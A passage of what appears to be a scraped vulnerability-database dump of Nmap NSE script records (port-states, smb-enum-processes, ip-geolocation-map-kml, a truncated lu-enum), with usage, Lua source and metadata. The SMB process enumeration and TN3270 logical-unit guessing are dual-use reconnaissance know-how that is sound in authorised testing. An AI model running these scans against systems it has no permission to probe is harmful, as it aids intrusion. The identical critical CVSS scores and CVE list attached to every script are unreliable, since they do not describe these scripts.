7,9,13,21,23,25-26,37,53,79-81,88,106,110-111,113,119,135,139,143-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,646,873,990,993,995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152,9,17,19,49,53,67,69,80,88,111,120,123,135-139,158,161-162,177,427,443,445,497,500,514-515,518,520,593,623,626,996-999,1022-1023,1025-1030,1433-1434,1645-1646,1701,1718-1719,1812-1813,1900,2000,2048-2049,2222-2223,3283,3456,3703,4444,4500,5000,5060,5632,9200,10000,17185,20031,30718,31337,32768-32769,32771,32815,33281,49152-49154,49156,49181-49182,49185-49186,49188,49190-49194,49200-49201,65024\n | udp:\n | open|filtered: 68,631,5353\n |_ closed: 7,9,17,19,49,53,67,69,80,88,111,120,123,135-139,158,161-162,177,427,443,445,497,500,514-515,518,520,593,623,626,996-999,1022-1023,1025-1030,1433-1434,1645-1646,1701,1718-1719,1812-1813,1900,2000,2048-2049,2222-2223,3283,3456,3703,4444,4500,5000,5060,5632,9200,10000,17185,20031,30718,31337,32768-32769,32771,32815,33281,49152-49154,49156,49181-49182,49185-49186,49188,49190-49194,49200-49201,65024\n \n\n## Requires \n\n * [table](<>)\n * [nmap](<../lib/nmap.html>)\n * [stdnse](<../lib/stdnse.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-11-16T21:41:46", "type": "nmap", "title": "port-states NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2020-11-16T21:41:46", "id": "NMAP:PORT-STATES.NSE", "href": "https://nmap.org/nsedoc/scripts/port-states.html", "sourceData": "local table = require \"table\"\nlocal nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nPrints a list of ports found in each state.\n\nNmap ordinarily summarizes \"uninteresting\" ports as \"Not shown: 94 closed\nports, 4 filtered ports\" but users may want to know which ports were filtered\nvs which were closed. This script will expand these summaries into a list of\nports and port ranges that were found in each state.\n]]\n\n---\n-- @output\n-- Host script results:\n-- | port-states:\n-- | tcp:\n-- | open: 22,631\n-- | closed: 7,9,13,21,23,25-26,37,53,79-81,88,106,110-111,113,119,135,139,143-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,646,873,990,993,995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152,9,17,19,49,53,67,69,80,88,111,120,123,135-139,158,161-162,177,427,443,445,497,500,514-515,518,520,593,623,626,996-999,1022-1023,1025-1030,1433-1434,1645-1646,1701,1718-1719,1812-1813,1900,2000,2048-2049,2222-2223,3283,3456,3703,4444,4500,5000,5060,5632,9200,10000,17185,20031,30718,31337,32768-32769,32771,32815,33281,49152-49154,49156,49181-49182,49185-49186,49188,49190-49194,49200-49201,65024\n-- | udp:\n-- | open|filtered: 68,631,5353\n-- |_ closed: 7,9,17,19,49,53,67,69,80,88,111,120,123,135-139,158,161-162,177,427,443,445,497,500,514-515,518,520,593,623,626,996-999,1022-1023,1025-1030,1433-1434,1645-1646,1701,1718-1719,1812-1813,1900,2000,2048-2049,2222-2223,3283,3456,3703,4444,4500,5000,5060,5632,9200,10000,17185,20031,30718,31337,32768-32769,32771,32815,33281,49152-49154,49156,49181-49182,49185-49186,49188,49190-49194,49200-49201,65024\n--\n-- @xmloutput\n-- <table key=\"tcp\">\n-- <elem key=\"open\">22,631</elem>\n-- <elem key=\"closed\">7,9,13,21,23,25-26,37,53,79-81,88,106,110-111,113,119,135,139,143-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,646,873,990,993,995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152,9,17,19,49,53,67,69,80,88,111,120,123,135-139,158,161-162,177,427,443,445,497,500,514-515,518,520,593,623,626,996-999,1022-1023,1025-1030,1433-1434,1645-1646,1701,1718-1719,1812-1813,1900,2000,2048-2049,2222-2223,3283,3456,3703,4444,4500,5000,5060,5632,9200,10000,17185,20031,30718,31337,32768-32769,32771,32815,33281,49152-49154,49156,49181-49182,49185-49186,49188,49190-49194,49200-49201,65024</elem>\n-- </table>\n-- <table key=\"udp\">\n-- <elem key=\"open|filtered\">68,631,5353</elem>\n-- <elem key=\"closed\">7,9,17,19,49,53,67,69,80,88,111,120,123,135-139,158,161-162,177,427,443,445,497,500,514-515,518,520,593,623,626,996-999,1022-1023,1025-1030,1433-1434,1645-1646,1701,1718-1719,1812-1813,1900,2000,2048-2049,2222-2223,3283,3456,3703,4444,4500,5000,5060,5632,9200,10000,17185,20031,30718,31337,32768-32769,32771,32815,33281,49152-49154,49156,49181-49182,49185-49186,49188,49190-49194,49200-49201,65024</elem>\n-- </table>\n\nauthor = \"Daniel Miller\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = { \"safe\" }\n\n-- the hostrule iterates over open ports for the host\nhostrule = function() return true end\n\nlocal states = {\n \"open\",\n \"open|filtered\",\n \"filtered\",\n \"unfiltered\",\n \"closed\",\n \"closed|filtered\"\n}\nlocal protos = {\n \"tcp\", \"udp\", \"sctp\"\n}\n\naction = function(host)\n local out = stdnse.output_table()\n for _, p in ipairs(protos) do\n local proto_out = stdnse.output_table()\n for _, s in ipairs(states) do\n local t = {}\n local port = nmap.get_ports(host, nil, p, s)\n while port do\n local rstart = port.number\n local prev\n repeat\n prev = port.number\n port = nmap.get_ports(host, port, p, s)\n if not port then break end\n until (port.number > prev + 1)\n if prev > rstart then\n t[#t+1] = (\"%d-%d\"):format(rstart, prev)\n else\n t[#t+1] = tostring(rstart)\n end\n end\n if #t > 0 then\n proto_out[s] = table.concat(t, \",\")\n end\n end\n if #proto_out > 0 then\n out[p] = proto_out\n end\n end\n if #out > 0 then\n return out\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:35:35", "description": "Pulls a list of processes from the remote server over SMB. This will determine all running processes, their process IDs, and their parent processes. It is done by querying the remote registry service, which is disabled by default on Vista; on all other Windows versions, it requires Administrator privileges. \n\nSince this requires administrator privileges, it isn't especially useful for a penetration tester, since they can effectively do the same thing with metasploit or other tools. It does, however, provide for a quick way to get process lists for a bunch of systems at the same time. \n\nWARNING: I have experienced crashes in `regsvc.exe` while making registry calls against a fully patched Windows 2000 system; I've fixed the issue that caused it, but there's no guarantee that it (or a similar vulnerability in the same code) won't show up again. Since the process automatically restarts, it doesn't negatively impact the system, besides showing a message box to the user.\n\n## Script Arguments \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the [smb](<../lib/smb.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script smb-enum-processes.nse -p445 <host>\n sudo nmap -sU -sS --script smb-enum-processes.nse -p U:137,T:139 <host>\n \n \n\n## Script Output \n \n \n Host script results:\n | smb-enum-processes:\n |_ |_ Idle, System, smss, csrss, winlogon, services, logon.scr, lsass, spoolsv, msdtc, VMwareService, svchost, alg, explorer, VMwareTray, VMwareUser, wmiprvse\n \n --\n Host script results:\n | smb-enum-processes:\n | `+-Idle\n | | `-System\n | | `-smss\n | | `+-csrss\n | | `-winlogon\n | | `+-services\n | | | `+-spoolsv\n | | | +-msdtc\n | | | +-VMwareService\n | | | +-svchost\n | | | `-alg\n | | +-logon.scr\n | | `-lsass\n | +-explorer\n | | `+-VMwareTray\n | | `-VMwareUser\n |_ `-wmiprvse\n \n --\n Host script results:\n | smb-enum-processes:\n | PID PPID Priority Threads Handles\n | ----- ----- -------- ------- -------\n | 0 0 0 1 0 `+-Idle\n | 4 0 8 49 395 | `-System\n | 252 4 11 3 19 | `-smss\n | 300 252 13 10 338 | `+-csrss\n | 324 252 13 18 513 | `-winlogon\n | 372 324 9 16 272 | `+-services\n | 872 372 8 12 121 | | `+-spoolsv\n | 896 372 8 13 151 | | +-msdtc\n | 1172 372 13 3 53 | | +-VMwareService\n | 1336 372 8 20 158 | | +-svchost\n | 1476 372 8 6 90 | | `-alg\n | 376 324 4 1 22 | +-logon.scr\n | 384 324 9 23 394 | `-lsass\n | 1720 1684 8 9 259 +-explorer\n | 1796 1720 8 1 42 | `+-VMwareTray\n | 1808 1720 8 1 44 | `-VMwareUser\n |_ 1992 580 8 7 179 `-wmiprvse\n \n\n## Requires \n\n * [msrpcperformance](<../lib/msrpcperformance.html>)\n * [nmap](<../lib/nmap.html>)\n * [smb](<../lib/smb.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2008-12-24T00:53:01", "type": "nmap", "title": "smb-enum-processes NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:SMB-ENUM-PROCESSES.NSE", "href": "https://nmap.org/nsedoc/scripts/smb-enum-processes.html", "sourceData": "local msrpcperformance = require \"msrpcperformance\"\nlocal nmap = require \"nmap\"\nlocal smb = require \"smb\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nPulls a list of processes from the remote server over SMB. This will determine\nall running processes, their process IDs, and their parent processes. It is done\nby querying the remote registry service, which is disabled by default on Vista;\non all other Windows versions, it requires Administrator privileges.\n\nSince this requires administrator privileges, it isn't especially useful for a\npenetration tester, since they can effectively do the same thing with metasploit\nor other tools. It does, however, provide for a quick way to get process lists\nfor a bunch of systems at the same time.\n\nWARNING: I have experienced crashes in <code>regsvc.exe</code> while making registry calls\nagainst a fully patched Windows 2000 system; I've fixed the issue that caused\nit, but there's no guarantee that it (or a similar vulnerability in the same code) won't\nshow up again. Since the process automatically restarts, it doesn't negatively\nimpact the system, besides showing a message box to the user.\n]]\n\n---\n-- @usage\n-- nmap --script smb-enum-processes.nse -p445 <host>\n-- sudo nmap -sU -sS --script smb-enum-processes.nse -p U:137,T:139 <host>\n--\n---\n-- @output\n-- Host script results:\n-- | smb-enum-processes:\n-- |_ |_ Idle, System, smss, csrss, winlogon, services, logon.scr, lsass, spoolsv, msdtc, VMwareService, svchost, alg, explorer, VMwareTray, VMwareUser, wmiprvse\n--\n-- --\n-- Host script results:\n-- | smb-enum-processes:\n-- | `+-Idle\n-- | | `-System\n-- | | `-smss\n-- | | `+-csrss\n-- | | `-winlogon\n-- | | `+-services\n-- | | | `+-spoolsv\n-- | | | +-msdtc\n-- | | | +-VMwareService\n-- | | | +-svchost\n-- | | | `-alg\n-- | | +-logon.scr\n-- | | `-lsass\n-- | +-explorer\n-- | | `+-VMwareTray\n-- | | `-VMwareUser\n-- |_ `-wmiprvse\n--\n-- --\n-- Host script results:\n-- | smb-enum-processes:\n-- | PID PPID Priority Threads Handles\n-- | ----- ----- -------- ------- -------\n-- | 0 0 0 1 0 `+-Idle\n-- | 4 0 8 49 395 | `-System\n-- | 252 4 11 3 19 | `-smss\n-- | 300 252 13 10 338 | `+-csrss\n-- | 324 252 13 18 513 | `-winlogon\n-- | 372 324 9 16 272 | `+-services\n-- | 872 372 8 12 121 | | `+-spoolsv\n-- | 896 372 8 13 151 | | +-msdtc\n-- | 1172 372 13 3 53 | | +-VMwareService\n-- | 1336 372 8 20 158 | | +-svchost\n-- | 1476 372 8 6 90 | | `-alg\n-- | 376 324 4 1 22 | +-logon.scr\n-- | 384 324 9 23 394 | `-lsass\n-- | 1720 1684 8 9 259 +-explorer\n-- | 1796 1720 8 1 42 | `+-VMwareTray\n-- | 1808 1720 8 1 44 | `-VMwareUser\n-- |_ 1992 580 8 7 179 `-wmiprvse\n-----------------------------------------------------------------------\n\nauthor = \"Ron Bowes\"\ncopyright = \"Ron Bowes\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"intrusive\"}\ndependencies = {\"smb-brute\"}\n\n\nfunction psl_mode (list, i)\n local mode\n\n -- Decide connector for process.\n if #list == 1 then\n mode = \"only\"\n elseif i == 1 then\n mode = \"first\"\n elseif i < #list then\n mode = \"middle\"\n else\n mode = \"last\"\n end\n\n return mode\nend\n\nfunction psl_print (psl, lvl)\n -- Print out table header.\n local result = {}\n if lvl == 2 then\n result[#result+1] = \" PID PPID Priority Threads Handles\\n\"\n result[#result+1] = \"----- ----- -------- ------- -------\\n\"\n end\n\n -- Find how many root processes there are.\n local roots = {}\n for i, ps in pairs(psl) do\n if psl[ps.ppid] == nil or ps.ppid == ps.pid then\n table.insert(roots, i)\n end\n end\n table.sort(roots)\n\n -- Create vertical sibling bars.\n local bars = {}\n if #roots ~= 1 then\n table.insert(bars, 2)\n end\n\n -- Print out each root of the tree.\n for i, root in ipairs(roots) do\n local mode = psl_mode(roots, i)\n psl_tree(psl, root, 0, bars, mode, lvl, result)\n end\n\n return table.concat(result)\nend\n\nfunction psl_tree (psl, pid, column, bars, mode, lvl, result)\n local ps = psl[pid]\n\n -- Delete vertical sibling link.\n if mode == \"last\" then\n table.remove(bars)\n end\n\n -- Print information table.\n local info = \"\"\n if lvl == 2 then\n info = string.format(\"% 5d % 5d % 8d % 7d % 7d \", ps.pid, ps.ppid, ps.prio, ps.thrd, ps.hndl)\n end\n\n -- Print vertical sibling bars.\n local prefix = \"\"\n for i=1, #bars do\n prefix = prefix .. string.rep(\" \", bars[i] - 1) .. \"|\"\n end\n\n -- Strings used to separate processes from one another.\n local separators = {\n first = \"`+-\";\n last = \" `-\";\n middle = \" +-\";\n only = \"`-\";\n }\n\n -- Format process itself.\n result[#result+1] = \"\\n\" .. info .. prefix .. separators[mode] .. ps.name\n\n -- Find children of the process.\n local children = {}\n for child_pid, child in pairs(psl) do\n if child_pid ~= pid and child.ppid == pid then\n table.insert(children, child_pid)\n end\n end\n table.sort(children)\n\n -- Add vertical sibling link between children.\n column = column + #separators[mode]\n if #children > 1 then\n table.insert(bars, column + 2)\n end\n\n -- Format process's children.\n for i, pid in ipairs(children) do\n local mode = psl_mode(children, i)\n psl_tree(psl, pid, column, bars, mode, lvl, result)\n end\n\n return result\nend\n\nhostrule = function(host)\n return smb.get_port(host) ~= nil\nend\n\naction = function(host)\n -- Get the process list\n local status, result = msrpcperformance.get_performance_data(host, \"230\")\n if status == false then\n return stdnse.format_output(false, result)\n end\n\n -- Get the process table\n local process = result[\"Process\"]\n\n -- Put the processes into an array, and sort them by pid.\n local names = {}\n for i, v in pairs(process) do\n if i ~= \"_Total\" then\n names[#names + 1] = i\n end\n end\n table.sort(names, function (a, b) return process[a][\"ID Process\"] < process[b][\"ID Process\"] end)\n\n -- Put the processes into an array indexed by pid and with a value equal\n -- to the name (so we can look it up easily when we need to).\n local process_id = {}\n for i, v in pairs(process) do\n process_id[v[\"ID Process\"]] = i\n end\n\n -- Fill the process list table.\n --\n -- Used fields:\n -- Creating Process ID\n -- Handle Count\n -- ID Process\n -- Priority Base\n -- Thread Count\n --\n -- Unused fields:\n -- % Privileged Time\n -- % Processor Time\n -- % User Time\n -- Elapsed Time\n -- IO Data Bytes/sec\n -- IO Data Operations/sec\n -- IO Other Bytes/sec\n -- IO Other Operations/sec\n -- IO Read Bytes/sec\n -- IO Read Operations/sec\n -- IO Write Bytes/sec\n -- IO Write Operations/sec\n -- Page Faults/sec\n -- Page File Bytes\n -- Page File Bytes Peak\n -- Pool Nonpaged Bytes\n -- Pool Paged Bytes\n -- Private Bytes\n -- Virtual Bytes\n -- Virtual Bytes Peak\n -- Working Set\n -- Working Set Peak\n local psl = {}\n for i, name in ipairs(names) do\n if name ~= \"_Total\" then\n psl[process[name][\"ID Process\"]] = {\n name = name;\n pid = process[name][\"ID Process\"];\n ppid = process[name][\"Creating Process ID\"];\n prio = process[name][\"Priority Base\"];\n thrd = process[name][\"Thread Count\"];\n hndl = process[name][\"Handle Count\"];\n }\n end\n end\n\n -- Produce final output.\n local response\n if nmap.verbosity() == 0 then\n response = \"|_ \" .. table.concat(names, \", \")\n else\n response = \"\\n\" .. psl_print(psl, nmap.verbosity())\n end\n\n return response\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:41:39", "description": "This script queries the Nmap registry for the GPS coordinates of targets stored by previous geolocation scripts and produces a KML file of points representing the targets.\n\n### See also:\n\n * [ ip-geolocation-geoplugin.nse ](<../scripts/ip-geolocation-geoplugin.html>)\n * [ ip-geolocation-ipinfodb.nse ](<../scripts/ip-geolocation-ipinfodb.html>)\n * [ ip-geolocation-map-bing.nse ](<../scripts/ip-geolocation-map-bing.html>)\n * [ ip-geolocation-map-google.nse ](<../scripts/ip-geolocation-map-google.html>)\n * [ ip-geolocation-maxmind.nse ](<../scripts/ip-geolocation-maxmind.html>)\n\n## Script Arguments \n\n#### ip-geolocation-map-kml.map_path \n\n(REQUIRED)\n\n## Example Usage \n \n \n nmap -sn -Pn --script ip-geolocation-geoplugin,ip-geolocation-map-kml --script-args ip-geolocation-map-kml.map_path=map.kml <target>\n \n\n## Script Output \n \n \n | ip-geolocation-map-kml:\n |_ The map has been saved at 'map.kml'.\n \n\n## Requires \n\n * [geoip](<../lib/geoip.html>)\n * [io](<>)\n * [oops](<../lib/oops.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-17T14:37:35", "type": "nmap", "title": "ip-geolocation-map-kml NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2019-09-20T04:40:20", "id": "NMAP:IP-GEOLOCATION-MAP-KML.NSE", "href": "https://nmap.org/nsedoc/scripts/ip-geolocation-map-kml.html", "sourceData": "local geoip = require \"geoip\"\nlocal io = require \"io\"\nlocal oops = require \"oops\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\n\ndescription = [[\nThis script queries the Nmap registry for the GPS coordinates of targets stored\nby previous geolocation scripts and produces a KML file of points representing\nthe targets.\n]]\n\n---\n-- @usage\n-- nmap -sn -Pn --script ip-geolocation-geoplugin,ip-geolocation-map-kml --script-args ip-geolocation-map-kml.map_path=map.kml <target>\n--\n-- @output\n-- | ip-geolocation-map-kml:\n-- |_ The map has been saved at 'map.kml'.\n--\n-- @args ip-geolocation-map-kml.map_path (REQUIRED)\n--\n-- @see ip-geolocation-geoplugin.nse\n-- @see ip-geolocation-ipinfodb.nse\n-- @see ip-geolocation-map-bing.nse\n-- @see ip-geolocation-map-google.nse\n-- @see ip-geolocation-maxmind.nse\n\nauthor = \"Mak Kolybabi <mak@kolybabi.com>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"safe\"}\n\nlocal render = function(path)\n local kml = {'<?xml version=\"1.0\" encoding=\"UTF-8\"?>\\n<kml xmlns=\"http://www.opengis.net/kml/2.2\">\\n <Document>'}\n\n for ip, coords in pairs(geoip.get_all_by_ip()) do\n table.insert(kml, ([[\n <Placemark>\n <name>%s</name>\n <Point>\n <coordinates>%s,%s</coordinates>\n </Point>\n </Placemark>]]):format(ip, coords[\"longitude\"], coords[\"latitude\"])\n )\n end\n\n table.insert(kml, ' </Document>\\n</kml>\\n')\n\n kml = table.concat(kml, \"\\n\")\n\n local f = io.open(path, \"w\")\n if not f then\n return false, (\"Failed to open file '%s'.\"):format(path)\n end\n\n if not f:write(kml) then\n return false, (\"Failed to write file '%s'.\"):format(path)\n end\n\n f:close()\n\n return true, (\"The map has been saved at '%s'.\"):format(path)\nend\n\nlocal parse_args = function()\n local map_path = stdnse.get_script_args(SCRIPT_NAME .. '.map_path')\n if not map_path then\n return false, \"Need to specify a path for the map.\"\n end\n\n return true, map_path\nend\n\npostrule = function()\n -- Only run if a previous script has registered geolocation data.\n return not geoip.empty()\nend\n\naction = function()\n -- Parse and sanity check the command line arguments.\n local status, path = oops.raise(\n \"Script argument problem\",\n parse_args())\n if not status then\n return path\n end\n\n -- Render the map.\n return oops.output(render(path))\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:41:03", "description": "Attempts to enumerate Logical Units (LU) of TN3270E servers. \n\nWhen connecting to a TN3270E server you are assigned a Logical Unit (LU) or you can tell the TN3270E server which LU you'd like to use. Typically TN3270E servers are configured to give you an LU from a pool of LUs. They can also have LUs set to take you to a specific application. This script attempts to guess valid LUs that bypass the default LUs you are assigned. For example, if a TN3270E server sends you straight to TPX you could use this script to find LUs that take you to TSO, CICS, etc.\n\n## Script Arguments \n\n#### lu-enum.path \n\nFolder used to store valid logical unit 'screenshots' Defaults to `None` and doesn't store anything. This stores all valid logical units.\n\n#### lulist \n\nPath to list of Logical Units to test. Defaults the initial Logical Unit TN3270E provides, replacing the last two characters with `00-99`.\n\n#### brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass \n\nSee the documentation for the [brute](<../lib/brute.html#script-args>) library. \n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n#### passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb \n\nSee the documentation for the [unpwdb](<../lib/unpwdb.html#script-args>) library. \n\n## Example Usage \n\n * nmap --script lu-enum -p 23 <targets>\n \n\n * nmap --script lu-enum --script-args lulist=lus.txt,\n lu-enum.path=\"/home/dade/screenshots/\" -p 23 -sV <targets>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON VERSION\n 23/tcp open tn3270 syn-ack IBM Telnet TN3270 (TN3270E)\n | lu-enum: \n | Logical Units: \n | LU:BSLVLU69 - Valid credentials\n |_ Statistics: Performed 7 guesses in 7 seconds, average tps: 1.0\n \n\n## Requires \n\n * [stdnse](<../lib/stdnse.html>)\n * [shortport](<../lib/shortport.html>)\n * [tn3270](<../lib/tn3270.html>)\n * [brute](<../lib/brute.html>)\n * [creds](<../lib/creds.html>)\n * [unpwdb](<../lib/unpwdb.html>)\n * [io](<>)\n * [nmap](<../lib/nmap.html>)\n * [string](<>)\n * [stringaux](<../lib/stringaux.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-03-21T04:15:20", "type": "nmap", "title": "lu-enum NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2019-03-21T04:15:20", "id": "NMAP:LU-ENUM.NSE", "href": "https://nmap.org/nsedoc/scripts/lu-enum.html", "sourceData": "local stdnse = require \"stdnse\"\nlocal shortport = require \"shortport\"\nlocal tn3270 = require \"tn3270\"\nlocal brute = require \"brute\"\nlocal creds = require \"creds\"\nlocal unpwdb = require \"unpwdb\"\nlocal io = require \"io\"\nlocal nmap = require \"nmap\"\nlocal string = require \"string\"\nlocal stringaux = require \"stringaux\"\nlocal table = require \"table\"\n\ndescription = [[\nAttempts to enumerate Logical Units (LU) of TN3270E servers.\n\nWhen connecting to a TN3270E server you are assigned a Logical Unit (LU) or you can tell\nthe TN3270E server which LU you'd like to use. Typically TN3270E servers are configured to \ngive you an LU from a pool of LUs. They can also have LUs set to take you to a specific\napplication. This script attempts to guess valid LUs that bypass the default LUs you are\nassigned. For example, if a TN3270E server sends you straight to TPX you could use this\nscript to find LUs that take you to TSO, CICS, etc.\n]]\n\n---\n--@args lulist Path to list of Logical Units to test.\n-- Defaults the initial Logical Unit TN3270E provides, replacing the \n-- last two characters with <code>00-99</code>.\n--@args lu-enum.path Folder used to store valid logical unit 'screenshots'\n-- Defaults to <code>None</code> and doesn't store anything. This stores \n-- all valid logical units.\n--@usage\n-- nmap --script lu-enum -p 23 <targets>\n--\n--@usage\n-- nmap --script lu-enum --script-args lulist=lus.txt,\n-- lu-enum.path=\"/home/dade/screenshots/\" -p 23 -sV <targets>\n--\n--@output\n-- PORT STATE SERVICE REASON VERSION\n-- 23/tcp open tn3270 syn-ack IBM Telnet TN3270 (TN3270E)\n-- | lu-enum: \n-- | Logical Units: \n-- | LU:BSLVLU69 - Valid credentials\n-- |_ Statistics: Performed 7 guesses in 7 seconds, average tps: 1.0\n-- \n-- @changelog\n-- 2019-02-04 - v0.1 - created by Soldier of Fortran\n\nauthor = \"Philip Young aka Soldier of Fortran\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\", \"brute\"}\n\nportrule = shortport.port_or_service({23,992}, \"tn3270\")\n\n--- Saves the TN3270E terminal screen to disk\n--\n-- @param filename string containing the name and full path to the file\n-- @param data contains the data\n-- @return status true on success, false on failure\n-- @return err string containing error message if status is false\nlocal function save_screens( filename, data )\n local f = io.open( filename, \"w\")\n if not f then return false, (\"Failed to open file (%s)\"):format(filename) end\n if not(f:write(data)) then return false, (\"Failed to write file (%s)\"):format(filename) end\n f:close()\n return true\nend\n\n--- Compares two screens and returns the difference as a percentage\n--\n-- @param1 the original screen\n-- @param2 the screen to compare to\nlocal function screen_diff( orig_screen, current_screen )\n if orig_screen == current_screen then return 100 end\n if #orig_screen == 0 or #current_screen == 0 then return 0 end\n local m = 1\n for i = 1 , #orig_screen do\n if orig_screen:byte(i) == current_screen:byte(i) then\n m = m + 1\n end\n end\n return (m/1920)*100\nend\n\nDriver = 